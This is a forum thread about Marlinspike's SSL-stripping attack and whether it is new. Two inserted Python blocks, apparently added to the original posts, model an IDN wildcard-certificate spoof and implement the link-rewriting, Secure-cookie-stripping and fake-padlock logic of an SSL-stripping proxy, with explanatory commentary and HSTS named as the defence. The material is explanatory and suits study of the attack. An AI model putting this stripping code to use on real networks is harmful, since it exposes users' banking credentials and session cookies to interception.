Wow, major https/http hole revealed at blackhat.....


bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

 

SagaLore

Elite Member
Dec 18, 2001
Originally posted by: bsobel
I don't know what you don't understand, this has been exploited for YEARS. TheMiddler was released last year, it has the same functionality. This is just one more of a LARGE number of SSL MiTM tools. Saying 'never been really exploited' is bullshit.

This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

TheMiddler exploits mixed http/https sites. It can inject root certs into a browser. It replaces https links with http links as part of a race condition. We're talking about completely different vectors. Sure, they're both man-in-the-middle attacks involving ssl, but how does a previous tool void any concern for this new one?
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
That is what is in their address bar. They have a VALID SSL session. They have the little lock. Unless the user is looking at the end of every single URL AND/OR looking at the certificate, they are none the wiser.

And they no longer have the green title bar since the attacker didn't get an extended validation cert...

And IF they went to https://mybank.com instead of http://mybank.com to start with, this attack wouldn't work, same as all of the other ssl stripping attacks.
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
It can inject root certs into a browser

Oh, what complete bullshit. Link please. This is a network attack; it in NO WAY modifies the root certs on the browser. Jesus, are you this dense?
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
That is what is in their address bar. They have a VALID SSL session. They have the little lock. Unless the user is looking at the end of every single URL AND/OR looking at the certificate, they are none the wiser.

And they no longer have the green title bar since the attacker didn't get an extended validation cert...

And IF they went to https://mybank.com instead of http://mybank.com to start with, this attack wouldn't work, same as all of the other ssl stripping attacks.

Once again I agree. But we are talking about what 99.9% of the population does. It will be very successful because the negative and positive alerts for https in browsers will not protect the user.
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

See, we agree. You just need to realize these attacks have existed IN THE WILD for years; I've written countermeasures for them that go into products. We helped create extended validation certs for this reason. This is a PITA, but it's not new or novel.
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

What is unique? It does the same thing as TheMiddler for https stripping attacks and the same thing as an sslstripper for its ssl strip attack. Both are extremely well known attacks that have existed for years.

And what is 'av helpdesk'? Since you attacked my credentials I'd like you to explain what it is you think I do. I'd also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

See we agree. You just need to realize these attacks have existed IN THE WILD for years, I've written countermeasures for them that go into products. We helped create extended validation certs for this reason. This is a PITA, but it's not new or novel.

Once again I will say this particular GENERAL method has not been "in the wild" for years. Variants sure. Specialized versions. Sure. But this is a general use method that will fool most browsers and most users. And it is simple to use to boot. That is the difference. Almost every previous MITM attack is VERY scoped to specific websites. This is a general attack that will get many many people.

This guy took pieces from his previous attacks and other attacks and packaged it all together into a whole new method that is very savvy.

My point is saying something like "this is nothing new" gives the impression that it isn't a real threat. This is a real threat. I will admit I shouldn't have jumped all over the "this is nothing new" comment, but I should have said it is still very dangerous to the general public.
 

SagaLore

Elite Member
Dec 18, 2001
Originally posted by: bsobel
As for TheMiddler, google for it. It was shown at Blackhat/Defcon last year. There is absolutely nothing new about this attack. It's simply a proxy that ensures any HTTPS addresses in a page are replaced with HTTP links. Since most sites support both, the user never gets directed to SSL and sends their info in plaintext. It's not rocket science; the only 'interesting' thing here is that there is one more 'off the shelf' tool for the script kiddies to use. Prior to TheMiddler these attacks were more custom and not shared...

For those looking for it, here is an explanation of what TheMiddler can do:

http://mirror.sweon.net/defcon.../defcon-16-beale-2.pdf

Seems the original site that hosted it as open source has been taken down.
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

What is unique? It does the same thing as TheMiddler for https stripping attacks and the same thing as an sslstripper for its ssl strip attack. Both are extremely well known attacks that have existed for years.

And what is 'av helpdesk'? Since you attacked my credentials I'd like you to explain what it is you think I do. I'd also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I will give my credentials. I work in the identity management realm. Specifically federated identity. I don't have to really worry as much about this particular attack in my work because we utilize client certificates.

 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
Once again I will say this particular GENERAL method has not been "in the wild" for years.

Yes it has, I deal with these attacks in my work.
 

SagaLore

Elite Member
Dec 18, 2001
Originally posted by: bsobel
And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I just assumed that is what you do since you tout how much you work at Symantec. :p FYI, you attacked me first and I responded in kind.

I'm a Sr. Network Security Analyst for a MSSP. I admit my article writing skills are poor, but I just needed to get something posted as quick as possible so I could get back to real work.
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
Originally posted by: SagaLore
Originally posted by: bsobel
And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I just assumed that is what you do since you tout how much you work at Symantec. :p FYI, you attacked me first and I responded in kind.

I'm a Sr. Network Security Analyst for a MSSP. I admit my article writing skills are poor, but I just needed to get something posted as quick as possible so I could get back to real work.

Which MSSP? And I didn't attack you, I told you you were wrong. I'd suggest you learn the difference. As far as 'posted as quick as possible', you should try to be accurate next time even if it takes a few more minutes. And I don't 'tout' that I work there, I disclaim it in posts that involve my products so users know my bias up front and can factor that in.
 

Crusty

Lifer
Sep 30, 2001
Originally posted by: bsobel
SSH uses SSL. The weakness is in SSL, not https or ssh.

Actually this is a weakness in https much more than SSL itself. It relies on seeing the plaintext traffic and stripping out ssl links (or directing the user to a different domain on SSL for which the attacker got a cert). It's not a break of SSL itself at all.

Yeah, the article I read didn't make a note of the fact that you need the plaintext traffic first. I thought it was just like the exploit that the MD5 collisions would allow. Either way, publicly broadcast wifi = bad news for personal information.
 

SagaLore

Elite Member
Dec 18, 2001
Originally posted by: bsobel
Which MSSP? And I didnt attack you, I told you you were wrong. I'd suggest you learn the difference. As far as 'posted as quick as possible', you should try to be accurate next time even if it takes a few more minutes. And I don't 'tout' that I work there, I disclaim it in posts that involve my products so users know my bias up front and can factor that in.

You're allowed to tell me I'm wrong, and point out why. These comments on the other hand:

Originally posted by: bsobel
What a completely bullshit article

Seriously, learn to read.

Seriously, you have no business commenting on this.

Hurt. :(:brokenheart:
 

five40

Golden Member
Oct 4, 2004
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
Once again I will say this particular GENERAL method has not been "in the wild" for years.

Yes it has, I deal with these attacks in my work.

So there are tools out there that will sit on a network and work for any and every https website.

A tool that will provide the user with HTTPS in the browser without any browser notifications that there are any problems(e.g. domain mismatch, etc..).

If this exploit has already existed in the wild, can you provide some links or discussion on said exploits?

I have never seen someone pair IDN-valid characters with valid wildcard ssl certs combined with SSL stripping to completely fool savvy web users. If it has existed in the wild, I just want to see some references.
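The "domain trick" that five40, Codewiz and bsobel argue about in the posts around here, as an added example (not code from the thread or from the Black Hat tool it discusses): an attacker holds a certificate for `*.attacker.example` (assumed domain) and, after the victim has been downgraded to HTTP, redirects the browser to a host whose leftmost labels read like a bank path because they contain U+2044 FRACTION SLASH (my choice of look-alike character; the thread only says "IDN-valid characters"). The block runs the certificate name check two ways, a permissive one where `*` may span dots and the strict one-label rule RFC 6125 later standardised, and adds the display-side check a defender wants: recover what a person actually reads as the host and compare it with the host the certificate was checked against. Everything else (`SPOOF_URL`, the helper names, the two-character look-alike set) is constructed for the example.

```python
"""
Added example, not code from the thread or from the Black Hat tool it
discusses. Models the "domain trick": a wildcard cert for *.attacker.example
(assumed) plus a hostname whose leftmost labels contain U+2044 FRACTION SLASH
(assumed look-alike), so the address bar reads like a bank URL while the
TLS name check sees one host under attacker.example.
"""

FRACTION_SLASH = "\u2044"
# Constructed, non-exhaustive set of glyphs a person reads as "/".
LOOKALIKE_SLASHES = {FRACTION_SLASH, "\u2215"}

ATTACKER_SAN = "*.attacker.example"
SPOOF_URL = ("https://www.wellsfargo.com" + FRACTION_SLASH + "online-banking"
             + FRACTION_SLASH + "login.attacker.example/")


def real_host(url):
    """Host the browser resolves and checks the certificate against."""
    return url.split("://", 1)[1].split("/", 1)[0].lower()


def apparent_host(url):
    """Host a person reads: text up to the first real or look-alike slash."""
    rest = url.split("://", 1)[1]
    for i, ch in enumerate(rest):
        if ch == "/" or ch in LOOKALIKE_SLASHES:
            return rest[:i].lower()
    return rest.lower()


def to_ace(host):
    """IDNA ASCII form: punycode each non-ASCII label under an xn-- prefix.
    Assumes the labels pass nameprep; Python's raw punycode codec is used."""
    return ".".join(
        label if label.isascii() else "xn--" + label.encode("punycode").decode("ascii")
        for label in host.split("."))


def glob_match(san, host):
    """Permissive wildcard check in which '*' may span dots.
    The trick only succeeds against a checker this loose."""
    san, host = san.lower(), host.lower()
    if not san.startswith("*."):
        return san == host
    return host.endswith(san[1:]) and len(host) > len(san) - 1


def rfc6125_match(san, host):
    """Strict check (RFC 6125 section 6.4.3): '*' is exactly one leftmost label."""
    s, h = san.lower().split("."), host.lower().split(".")
    if s[0] != "*" or len(s) < 3 or len(s) != len(h) or not h[0]:
        return san.lower() == host.lower()
    return s[1:] == h[1:]


def looks_spoofed(url):
    """Display-side check: the readable host differs from the real one."""
    return apparent_host(url) != real_host(url)


def demo():
    host = real_host(SPOOF_URL)
    return {
        "real_host": host,
        "ace_host": to_ace(host),
        "apparent_host": apparent_host(SPOOF_URL),
        "cert_matches_permissive": glob_match(ATTACKER_SAN, host),
        "cert_matches_strict": rfc6125_match(ATTACKER_SAN, host),
        # What bsobel describes: a user who typed https://www.wellsfargo.com
        # never reaches a host the attacker's certificate can match.
        "typed_https_matches": glob_match(ATTACKER_SAN, "www.wellsfargo.com"),
        "looks_spoofed": looks_spoofed(SPOOF_URL),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two results that matter are the last two keys: the attacker's certificate never matches `www.wellsfargo.com`, so a user who started at `https://` is not redirected into the trick, while a browser that was already on plaintext and followed the MITM's redirect sees a host ending in `.attacker.example` that the wildcard covers. The `looks_spoofed` comparison is the kind of check a proxy or browser extension can run on the resolved host, since it needs no knowledge of which sites are banks.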
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
Originally posted by: five40
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

Actually it does, since the MiTM has to redirect the user to wildcarded domain name. The browser will complain since the cert won't match the entered URL.
 

bsobel

Moderator Emeritus, Elite Member
Dec 9, 2001
If it has existed in the wild, I just want to see some references.

The closest public reference I can give you is the Middler reference I talked about before. You can also google for sslstripping; it should be pretty obvious. I've inspected hardware/software put together to do this. At Defcon there were some great examples of the evil twin attack and this that involved the AP built into old books (hollowed out enough to hold the AP with modified WRT stack, and batteries, and an evdo card for the passthrough).
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: five40
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

It does if you open your browser and go directly to https://www.wachovia.com instead of http://www.wachovia.com

The domain trick is just another tool that fools users that want to see https in the address bar. It is no different than the http trick except the tool now lets the user's browser create an https connection to the tool with a valid certificate and a URL that appears valid.
 

Codewiz

Diamond Member
Jan 23, 2002
Originally posted by: bsobel
Originally posted by: five40
Originally posted by: Codewiz
Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

Actually it does, since the MiTM has to redirect the user to wildcarded domain name. The browser will complain since the cert won't match the entered URL.

The cert will match the entered URL.
 

SagaLore

Elite Member
Dec 18, 2001
Originally posted by: Crusty
Originally posted by: bsobel
SSH uses SSL. The weakness is in SSL, not https or ssh.

Actually this is a weakness in https much more than SSL itself. It relies on seeing the plaintext traffic and stripping out ssl links (or directing the user to a different domain on SSL for which the attacker got a cert). It's not a break of SSL itself at all.

Yeah, the article I read didn't make a note of the fact that you need the plaintext traffic first. I thought it was just like the exploit that the MD5 collisions would allow. Either way, publicly broadcast wifi = bad news for personal information.

Only going by the article, here is what happens:

* Watches traffic
* When it sees HTTPS, it substitutes it with HTTP
* Tells the server that an encrypted page has been sent
* Adds padlock icon to URL

So the server actually doesn't know you're on http, so it won't redirect you? It's funny that the padlock icon is what really is getting everyone.
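The four steps SagaLore lists, as an added example that is not code from the thread, from sslstrip or from TheMiddler: the proxy keeps an HTTPS session with the real server and an HTTP session with the victim, and rewrites everything in the relayed plaintext that would have moved the browser back to HTTPS (links, form actions, `Location` redirects), while remembering which URLs it downgraded so the victim's later plaintext requests for them are fetched upstream over HTTPS. The favicon swap stands in for the "padlock icon" step. Removing the `Secure` attribute from cookies is my addition for completeness and is not attributed to either tool. All host names, HTML and headers (`www.bank.example`, `lock.attacker.example`, the sample page) are constructed.

```python
"""
Added example, not code from the thread or from sslstrip/TheMiddler.
Models the relay step of an SSL-stripping proxy: HTTPS to the real server,
HTTP to the victim, and every https:// reference in the relayed plaintext
rewritten so the browser never upgrades. All data below is constructed.
"""
import re

# Absolute https:// references in HTML, JavaScript or headers (simplified pattern).
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+)(/[^\s\"'<>]*)?")

# Assumed attacker-served image used to fake the padlock the post mentions.
LOCK_FAVICON = "http://lock.attacker.example/lock.ico"


class Stripper:
    """Per-victim state: which (host, path) pairs were downgraded, so the
    victim's later plaintext request for them is fetched upstream over HTTPS.
    The real server only ever sees an ordinary TLS client (the proxy), which
    is why it cannot tell that the victim is on HTTP."""

    def __init__(self):
        self.secure = set()

    def _downgrade(self, m):
        host, path = m.group(1), m.group(2) or "/"
        self.secure.add((host, path))
        return "http://" + host + path

    def rewrite_body(self, html):
        """Step 2 of the post: every HTTPS link in the page becomes HTTP."""
        html = HTTPS_URL.sub(self._downgrade, html)
        # Step 4: swap the site's favicon for a lock image so the tab shows a "padlock".
        return re.sub(
            r"(<link[^>]*rel=[\"']?(?:shortcut )?icon[\"']?[^>]*href=[\"'])[^\"']*",
            lambda m: m.group(1) + LOCK_FAVICON, html)

    def rewrite_headers(self, headers):
        """Server redirects to https:// are relayed as http://; Secure cookie
        flags are dropped (my addition) so the cookie is sent over plaintext."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "location":
                value = HTTPS_URL.sub(self._downgrade, value)
            elif name.lower() == "set-cookie":
                value = re.sub(r";\s*secure", "", value, flags=re.IGNORECASE)
            out[name] = value
        return out

    def upstream_scheme(self, host, path):
        """Step 3: scheme the proxy uses toward the real server for a victim
        request. Downgraded URLs go back up over HTTPS, so the server still
        gets the encrypted request it expects."""
        return "https" if (host, path) in self.secure else "http"


def demo():
    """Run the rewrite over a constructed bank page and response headers."""
    s = Stripper()
    page = ('<link rel="icon" href="https://www.bank.example/favicon.ico">'
            '<a href="https://www.bank.example/login">Log in</a>'
            '<form action="https://www.bank.example/auth" method="post">')
    headers = {"Location": "https://www.bank.example/login",
               "Set-Cookie": "session=abc123; Secure; HttpOnly"}
    return s.rewrite_body(page), s.rewrite_headers(headers), s


if __name__ == "__main__":
    body, hdrs, state = demo()
    print(body)
    print(hdrs)
    print(sorted(state.secure))
```

Nothing in this path touches the browser's certificate store or breaks TLS: the only thing the proxy has to see is the first plaintext response. That also answers the question above about the server: from the bank's side the connection is a normal HTTPS session from the proxy's address, so there is nothing for it to redirect. The browser-side fix that later closed this gap, HTTP Strict Transport Security (RFC 6797, 2012), works by having the browser refuse to make the plaintext request at all for hosts it has seen the header from, which is exactly the step this code depends on.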